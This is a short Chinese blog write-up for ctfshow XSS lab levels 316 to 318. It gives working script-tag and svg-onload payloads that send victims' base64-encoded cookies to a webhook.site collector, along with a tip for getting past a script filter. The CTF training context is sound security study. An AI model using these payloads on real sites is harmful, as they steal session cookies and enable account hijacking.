ctfshow xss漏洞
第316关-第321关
第316关
直接使用webhook
输入1
2
3
4<script>
var img = new Image();
img.src = "https://webhook.site/你的专属ID?cookie=" + btoa(document.cookie);
</script>
然后正常等就行,一般会刷新几轮刷出来
第317关
对script的绕过,换一个测试语句就好<svg onload="new Image().src='https://webhook.site/你的专属ID?cookie=' + btoa(document.cookie)">
第318关
和前面一样的没啥好说
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 小chen妙妙屋!
评论